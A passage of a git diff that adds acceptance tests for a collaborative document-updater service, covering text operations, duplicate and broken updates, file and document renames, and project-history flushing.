and a half\n', + p: 4, + } + this.update = { + doc: this.doc_id, + op: [this.op], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + DocUpdaterApp.ensureRunning(done) + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + sinon.spy(MockWebApi, 'getDocument') + this.startTime = Date.now() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should load the document from the web API', function () { + MockWebApi.getDocument + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should push the applied updates to the project history changes api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error != null) { + throw error + } + JSON.parse(updates[0]).op.should.deep.equal([this.op]) + done() + } + ) + }) + + it('should set the first op timestamp', function (done) { + rclientProjectHistory.get( + ProjectHistoryKeys.projectHistoryFirstOpTimestamp({ + project_id: this.project_id, + }), + (error, result) => { + if (error != null) { + throw error + } + result = parseInt(result, 10) + result.should.be.within(this.startTime, Date.now()) + this.firstOpTimestamp = result + done() + } + ) + }) + + it('should yield last updated time', function (done) { + DocUpdaterClient.getProjectLastUpdatedAt( + this.project_id, + (error, res, body) => { + if (error != null) { + throw error + } + res.statusCode.should.equal(200) + body.lastUpdatedAt.should.be.within(this.startTime, Date.now()) + done() + } + ) + }) + + it('should yield no last updated time for another project', function (done) { + DocUpdaterClient.getProjectLastUpdatedAt( + DocUpdaterClient.randomId(), + (error, res, body) => { + if (error != null) { + throw error + } + res.statusCode.should.equal(200) + body.should.deep.equal({}) + done() + } + ) + }) + + describe('when sending another update', function () { + before(function (done) { + this.timeout(10000) + this.second_update = Object.assign({}, this.update) + this.second_update.v = this.version + 1 + this.secondStartTime = Date.now() + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.second_update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) done(error) + doc.lines.should.deep.equal([ + 'one', + 'one and a half', + 'one and a half', + 'two', + 'three', + ]) + done() + } + ) + }) + + it('should not change the first op timestamp', function (done) { + rclientProjectHistory.get( + ProjectHistoryKeys.projectHistoryFirstOpTimestamp({ + project_id: this.project_id, + }), + (error, result) => { + if (error != null) { + throw error + } + result = parseInt(result, 10) + 
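+          // the timestamp was recorded when the first update arrived; a
+          // subsequent update must leave it untouched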
result.should.equal(this.firstOpTimestamp) + done() + } + ) + }) + + it('should yield last updated time', function (done) { + DocUpdaterClient.getProjectLastUpdatedAt( + this.project_id, + (error, res, body) => { + if (error != null) { + throw error + } + res.statusCode.should.equal(200) + body.lastUpdatedAt.should.be.within( + this.secondStartTime, + Date.now() + ) + done() + } + ) + }) + }) + }) + + describe('when the document is loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should not need to call the web api', function () { + MockWebApi.getDocument.called.should.equal(false) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should push the applied updates to the project history changes api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) return done(error) + JSON.parse(updates[0]).op.should.deep.equal([this.op]) + done() + } + ) + }) + }) + + describe('when the document is loaded and is using project-history only', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should push the applied updates to the project history changes api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) return done(error) + JSON.parse(updates[0]).op.should.deep.equal([this.op]) + done() + } + ) + }) + }) + + describe('when the document has been deleted', function () { + describe('when the ops come in a single linear order', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + const lines = ['', '', ''] + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines, + version: 0, + }) + this.updates = [ + { doc_id: this.doc_id, v: 0, op: [{ i: 'h', p: 0 }] }, + { doc_id: this.doc_id, v: 1, op: [{ 
i: 'e', p: 1 }] }, + { doc_id: this.doc_id, v: 2, op: [{ i: 'l', p: 2 }] }, + { doc_id: this.doc_id, v: 3, op: [{ i: 'l', p: 3 }] }, + { doc_id: this.doc_id, v: 4, op: [{ i: 'o', p: 4 }] }, + { doc_id: this.doc_id, v: 5, op: [{ i: ' ', p: 5 }] }, + { doc_id: this.doc_id, v: 6, op: [{ i: 'w', p: 6 }] }, + { doc_id: this.doc_id, v: 7, op: [{ i: 'o', p: 7 }] }, + { doc_id: this.doc_id, v: 8, op: [{ i: 'r', p: 8 }] }, + { doc_id: this.doc_id, v: 9, op: [{ i: 'l', p: 9 }] }, + { doc_id: this.doc_id, v: 10, op: [{ i: 'd', p: 10 }] }, + ] + this.my_result = ['hello world', '', ''] + done() + }) + + it('should be able to continue applying updates when the project has been deleted', function (done) { + let update + const actions = [] + for (update of this.updates.slice(0, 6)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + actions.push(callback => + DocUpdaterClient.deleteDoc(this.project_id, this.doc_id, callback) + ) + for (update of this.updates.slice(6)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + + async.series(actions, error => { + if (error != null) { + throw error + } + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.my_result) + done() + } + ) + }) + }) + + it('should store the doc ops in the correct order', function (done) { + rclientDU.lrange( + Keys.docOps({ doc_id: this.doc_id }), + 0, + -1, + (error, updates) => { + if (error) return done(error) + updates = updates.map(u => JSON.parse(u)) + for (let i = 0; i < this.updates.length; i++) { + const appliedUpdate = this.updates[i] + appliedUpdate.op.should.deep.equal(updates[i].op) + } + done() + } + ) + }) + }) + + describe('when older ops come in after the delete', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + const lines = ['', '', ''] + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines, + version: 0, + }) + this.updates = [ + { doc_id: this.doc_id, v: 0, op: [{ i: 'h', p: 0 }] }, + { doc_id: this.doc_id, v: 1, op: [{ i: 'e', p: 1 }] }, + { doc_id: this.doc_id, v: 2, op: [{ i: 'l', p: 2 }] }, + { doc_id: this.doc_id, v: 3, op: [{ i: 'l', p: 3 }] }, + { doc_id: this.doc_id, v: 4, op: [{ i: 'o', p: 4 }] }, + { doc_id: this.doc_id, v: 0, op: [{ i: 'world', p: 1 }] }, + ] + this.my_result = ['hello', 'world', ''] + done() + }) + + it('should be able to continue applying updates when the project has been deleted', function (done) { + let update + const actions = [] + for (update of this.updates.slice(0, 5)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + actions.push(callback => + DocUpdaterClient.deleteDoc(this.project_id, this.doc_id, callback) + ) + for (update of this.updates.slice(5)) { + ;(update => { + actions.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + })(update) + } + + async.series(actions, error => { + if (error != null) { + throw error + } + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.my_result) + done() + } + ) + }) + }) + }) + 
}) + + describe('with a broken update', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + this.broken_update = { + doc_id: this.doc_id, + v: this.version, + op: [{ d: 'not the correct content', p: 0 }], + } + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + DocUpdaterClient.subscribeToAppliedOps( + (this.messageCallback = sinon.stub()) + ) + + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.broken_update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.lines) + done() + } + ) + }) + + it('should send a message with an error', function () { + this.messageCallback.called.should.equal(true) + const [channel, message] = this.messageCallback.args[0] + channel.should.equal('applied-ops') + JSON.parse(message).should.deep.include({ + project_id: this.project_id, + doc_id: this.doc_id, + error: 'Delete component does not match', + }) + }) + }) + + describe('when there is no version in Mongo', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + }) + + const update = { + doc: this.doc_id, + op: this.update.op, + v: 0, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should update the doc (using version = 0)', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + }) + + describe('when the sending duplicate ops', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + DocUpdaterClient.subscribeToAppliedOps( + (this.messageCallback = sinon.stub()) + ) + + // One user delete 'one', the next turns it into 'once'. The second becomes a NOP. 
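+      // Concretely: the same insert is sent twice with the same meta.source.
+      // The second update lists that source in dupIfSource, so the document
+      // updater treats it as a duplicate, applies it as a no-op, and
+      // re-broadcasts it with op.dup === true (asserted below).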
+ DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + meta: { + source: 'ikHceq3yfAdQYzBo4-xZ', + }, + }, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + dupIfSource: ['ikHceq3yfAdQYzBo4-xZ'], + meta: { + source: 'ikHceq3yfAdQYzBo4-xZ', + }, + }, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }, 200) + } + ) + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.result) + done() + } + ) + }) + + it('should return a message about duplicate ops', function () { + this.messageCallback.calledTwice.should.equal(true) + this.messageCallback.args[0][0].should.equal('applied-ops') + expect(JSON.parse(this.messageCallback.args[0][1]).op.dup).to.be.undefined + this.messageCallback.args[1][0].should.equal('applied-ops') + expect(JSON.parse(this.messageCallback.args[1][1]).op.dup).to.equal(true) + }) + }) + + describe('when sending updates for a non-existing doc id', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + this.non_existing = { + doc_id: this.doc_id, + v: this.version, + op: [{ d: 'content', p: 0 }], + } + + DocUpdaterClient.subscribeToAppliedOps( + (this.messageCallback = sinon.stub()) + ) + + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.non_existing, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update or create a doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + done() + } + ) + }) + + it('should send a message with an error', function () { + this.messageCallback.called.should.equal(true) + const [channel, message] = this.messageCallback.args[0] + channel.should.equal('applied-ops') + JSON.parse(message).should.deep.include({ + project_id: this.project_id, + doc_id: this.doc_id, + error: `doc not not found: /project/${this.project_id}/doc/${this.doc_id}`, + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/ApplyingUpdatesToProjectStructureTests.js b/services/document-updater/test/acceptance/js/ApplyingUpdatesToProjectStructureTests.js new file mode 100644 index 0000000..9e825a4 --- /dev/null +++ b/services/document-updater/test/acceptance/js/ApplyingUpdatesToProjectStructureTests.js @@ -0,0 +1,671 @@ +const sinon = require('sinon') +const Settings = require('@overleaf/settings') +const rclientProjectHistory = require('@overleaf/redis-wrapper').createClient( + Settings.redis.project_history +) +const ProjectHistoryKeys = Settings.redis.project_history.key_schema + +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe("Applying updates to a project's structure", function () { + before(function () { + this.user_id = 'user-id-123' + this.version = 1234 + }) + + describe('renaming a 
file', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.fileUpdate = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + newPathname: '/new-file-path', + } + this.updates = [this.fileUpdate] + DocUpdaterApp.ensureRunning(error => { + if (error) { + return done(error) + } + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + }) + + it('should push the applied file renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.file.should.equal(this.fileUpdate.id) + update.pathname.should.equal('/file-path') + update.new_pathname.should.equal('/new-file-path') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('deleting a file', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.fileUpdate = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + newPathname: '', + } + this.updates = [this.fileUpdate] + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied file renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.file.should.equal(this.fileUpdate.id) + update.pathname.should.equal('/file-path') + update.new_pathname.should.equal('') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('renaming a document', function () { + before(function () { + this.update = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path', + newPathname: '/new-doc-path', + } + this.updates = [this.update] + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied doc renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('/new-doc-path') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('when the document is loaded', function () { + before(function (done) 
{ + this.project_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.update.id, {}) + DocUpdaterClient.preloadDoc(this.project_id, this.update.id, error => { + if (error) { + return done(error) + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.update.id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.pathname.should.equal(this.update.newPathname) + done() + } + ) + }) + + it('should push the applied doc renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('/new-doc-path') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + }) + + describe('renaming multiple documents and files', function () { + before(function () { + this.docUpdate0 = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path0', + newPathname: '/new-doc-path0', + } + this.docUpdate1 = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path1', + newPathname: '/new-doc-path1', + } + this.fileUpdate0 = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path0', + newPathname: '/new-file-path0', + } + this.fileUpdate1 = { + type: 'rename-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path1', + newPathname: '/new-file-path1', + } + this.updates = [ + this.docUpdate0, + this.docUpdate1, + this.fileUpdate0, + this.fileUpdate1, + ] + }) + + describe('when the documents are not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied doc renames to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + let update = JSON.parse(updates[0]) + update.doc.should.equal(this.docUpdate0.id) + update.pathname.should.equal('/doc-path0') + update.new_pathname.should.equal('/new-doc-path0') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + update = JSON.parse(updates[1]) + update.doc.should.equal(this.docUpdate1.id) + update.pathname.should.equal('/doc-path1') + update.new_pathname.should.equal('/new-doc-path1') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.1`) + + update = JSON.parse(updates[2]) + update.file.should.equal(this.fileUpdate0.id) + update.pathname.should.equal('/file-path0') 
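+          // Editor's note: each update in a batch gets a distinct
+          // subversion of the shared project version -- `${version}.0`
+          // through `${version}.3` in this block -- so the relative order
+          // of the four renames is preserved in the history queue.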
+ update.new_pathname.should.equal('/new-file-path0') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.2`) + + update = JSON.parse(updates[3]) + update.file.should.equal(this.fileUpdate1.id) + update.pathname.should.equal('/file-path1') + update.new_pathname.should.equal('/new-file-path1') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.3`) + + done() + } + ) + }) + }) + }) + + describe('deleting a document', function () { + before(function () { + this.update = { + type: 'rename-doc', + id: DocUpdaterClient.randomId(), + pathname: '/doc-path', + newPathname: '', + } + this.updates = [this.update] + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + + it('should push the applied doc update to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + + describe('when the document is loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.update.id, {}) + DocUpdaterClient.preloadDoc(this.project_id, this.update.id, error => { + if (error) { + return done(error) + } + sinon.spy(MockWebApi, 'getDocument') + DocUpdaterClient.sendProjectUpdate( + this.project_id, + this.user_id, + this.updates, + this.version, + error => { + if (error) { + return done(error) + } + setTimeout(done, 200) + } + ) + }) + }) + + after(function () { + MockWebApi.getDocument.restore() + }) + + it('should not modify the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.update.id, + (error, res, doc) => { + if (error) { + return done(error) + } + + doc.pathname.should.equal('/a/b/c.tex') // default pathname from MockWebApi + done() + } + ) + }) + + it('should push the applied doc update to the project history api', function (done) { + rclientProjectHistory.lrange( + ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }), + 0, + -1, + (error, updates) => { + if (error) { + return done(error) + } + + const update = JSON.parse(updates[0]) + update.doc.should.equal(this.update.id) + update.pathname.should.equal('/doc-path') + update.new_pathname.should.equal('') + update.meta.user_id.should.equal(this.user_id) + update.meta.ts.should.be.a('string') + update.version.should.equal(`${this.version}.0`) + + done() + } + ) + }) + }) + }) + + describe('adding a file', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.fileUpdate = { + type: 'add-file', + id: DocUpdaterClient.randomId(), + pathname: '/file-path', + url: 'filestore.example.com', + } + this.updates = [this.fileUpdate] + DocUpdaterClient.sendProjectUpdate( 
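+        // Editor's note: an 'add-file' update carries a filestore `url`,
+        // while the 'add-doc' update in the next describe carries the
+        // content itself as `docLines`; both surface unchanged in the
+        // project history queue, as the assertions below check.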
+        this.project_id,
+        this.user_id,
+        this.updates,
+        this.version,
+        error => {
+          if (error) {
+            return done(error)
+          }
+          setTimeout(done, 200)
+        }
+      )
+    })
+
+    it('should push the file addition to the project history api', function (done) {
+      rclientProjectHistory.lrange(
+        ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }),
+        0,
+        -1,
+        (error, updates) => {
+          if (error) {
+            return done(error)
+          }
+
+          const update = JSON.parse(updates[0])
+          update.file.should.equal(this.fileUpdate.id)
+          update.pathname.should.equal('/file-path')
+          update.url.should.equal('filestore.example.com')
+          update.meta.user_id.should.equal(this.user_id)
+          update.meta.ts.should.be.a('string')
+          update.version.should.equal(`${this.version}.0`)
+
+          done()
+        }
+      )
+    })
+  })
+
+  describe('adding a doc', function () {
+    before(function (done) {
+      this.project_id = DocUpdaterClient.randomId()
+      this.docUpdate = {
+        type: 'add-doc',
+        id: DocUpdaterClient.randomId(),
+        pathname: '/file-path',
+        docLines: 'a\nb',
+      }
+      this.updates = [this.docUpdate]
+      DocUpdaterClient.sendProjectUpdate(
+        this.project_id,
+        this.user_id,
+        this.updates,
+        this.version,
+        error => {
+          if (error) {
+            return done(error)
+          }
+          setTimeout(done, 200)
+        }
+      )
+    })
+
+    it('should push the doc addition to the project history api', function (done) {
+      rclientProjectHistory.lrange(
+        ProjectHistoryKeys.projectHistoryOps({ project_id: this.project_id }),
+        0,
+        -1,
+        (error, updates) => {
+          if (error) {
+            return done(error)
+          }
+
+          const update = JSON.parse(updates[0])
+          update.doc.should.equal(this.docUpdate.id)
+          update.pathname.should.equal('/file-path')
+          update.docLines.should.equal('a\nb')
+          update.meta.user_id.should.equal(this.user_id)
+          update.meta.ts.should.be.a('string')
+          update.version.should.equal(`${this.version}.0`)
+
+          done()
+        }
+      )
+    })
+  })
+
+  describe('with enough updates to flush to the history service', function () {
+    before(function (done) {
+      this.project_id = DocUpdaterClient.randomId()
+      this.user_id = DocUpdaterClient.randomId()
+      this.version0 = 12345
+      this.version1 = this.version0 + 1
+      const updates = []
+      for (let v = 0; v <= 599; v++) {
+        // Should flush after 500 ops
+        updates.push({
+          type: 'add-doc',
+          id: DocUpdaterClient.randomId(),
+          pathname: '/file-' + v,
+          docLines: 'a\nb',
+        })
+      }
+
+      sinon.spy(MockProjectHistoryApi, 'flushProject')
+
+      // Send updates in chunks to cause multiple flushes
+      const projectId = this.project_id
+      const userId = this.user_id
+      DocUpdaterClient.sendProjectUpdate(
+        projectId,
+        userId,
+        updates.slice(0, 250),
+        this.version0,
+        error => {
+          if (error) {
+            return done(error)
+          }
+          DocUpdaterClient.sendProjectUpdate(
+            projectId,
+            userId,
+            updates.slice(250),
+            this.version1,
+            error => {
+              if (error) {
+                return done(error)
+              }
+              setTimeout(done, 2000)
+            }
+          )
+        }
+      )
+    })
+
+    after(function () {
+      MockProjectHistoryApi.flushProject.restore()
+    })
+
+    it('should flush project history', function () {
+      MockProjectHistoryApi.flushProject
+        .calledWith(this.project_id)
+        .should.equal(true)
+    })
+  })
+
+  describe('with too few updates to flush to the history service', function () {
+    before(function (done) {
+      this.project_id = DocUpdaterClient.randomId()
+      this.user_id = DocUpdaterClient.randomId()
+      this.version0 = 12345
+      this.version1 = this.version0 + 1
+
+      const updates = []
+      for (let v = 0; v <= 42; v++) {
+        // Only 43 updates, well below the 500 op flush threshold
+        updates.push({
+          type: 'add-doc',
+          id: DocUpdaterClient.randomId(),
+          pathname: '/file-' + v,
+          docLines: 'a\nb',
+        })
+      }
+
+      sinon.spy(MockProjectHistoryApi, 'flushProject')
+
+      // Send updates in chunks
+      const projectId = this.project_id
+      const userId = this.user_id
+      DocUpdaterClient.sendProjectUpdate(
+        projectId,
+        userId,
+        updates.slice(0, 10),
+        this.version0,
+        error => {
+          if (error) {
+            return done(error)
+          }
+          DocUpdaterClient.sendProjectUpdate(
+            projectId,
+            userId,
+            updates.slice(10),
+            this.version1,
+            error => {
+              if (error) {
+                return done(error)
+              }
+              setTimeout(done, 2000)
+            }
+          )
+        }
+      )
+    })
+
+    after(function () {
+      MockProjectHistoryApi.flushProject.restore()
+    })
+
+    it('should not flush project history', function () {
+      MockProjectHistoryApi.flushProject
+        .calledWith(this.project_id)
+        .should.equal(false)
+    })
+  })
+})
diff --git a/services/document-updater/test/acceptance/js/CheckRedisMongoSyncStateTests.js b/services/document-updater/test/acceptance/js/CheckRedisMongoSyncStateTests.js
new file mode 100644
index 0000000..ebbc015
--- /dev/null
+++ b/services/document-updater/test/acceptance/js/CheckRedisMongoSyncStateTests.js
@@ -0,0 +1,371 @@
+const MockWebApi = require('./helpers/MockWebApi')
+const DocUpdaterClient = require('./helpers/DocUpdaterClient')
+const DocUpdaterApp = require('./helpers/DocUpdaterApp')
+const { promisify } = require('node:util')
+const { exec } = require('node:child_process')
+const { expect } = require('chai')
+const Settings = require('@overleaf/settings')
+const fs = require('node:fs')
+const Path = require('node:path')
+const MockDocstoreApi = require('./helpers/MockDocstoreApi')
+const sinon = require('sinon')
+
+const rclient = require('@overleaf/redis-wrapper').createClient(
+  Settings.redis.documentupdater
+)
+
+describe('CheckRedisMongoSyncState', function () {
+  beforeEach(function (done) {
+    DocUpdaterApp.ensureRunning(done)
+  })
+  beforeEach(async function () {
+    await rclient.flushall()
+  })
+
+  let peekDocumentInDocstore
+  beforeEach(function () {
+    peekDocumentInDocstore = sinon.spy(MockDocstoreApi, 'peekDocument')
+  })
+  afterEach(function () {
+    peekDocumentInDocstore.restore()
+  })
+
+  async function runScript(options) {
+    let result
+    try {
+      result = await promisify(exec)(
+        Object.entries(options)
+          .map(([key, value]) => `${key}=${value}`)
+          .concat(['node', 'scripts/check_redis_mongo_sync_state.js'])
+          .join(' ')
+      )
+    } catch (error) {
+      // includes details like exit code, stdErr and stdOut
+      return error
+    }
+    result.code = 0
+    return result
+  }
+
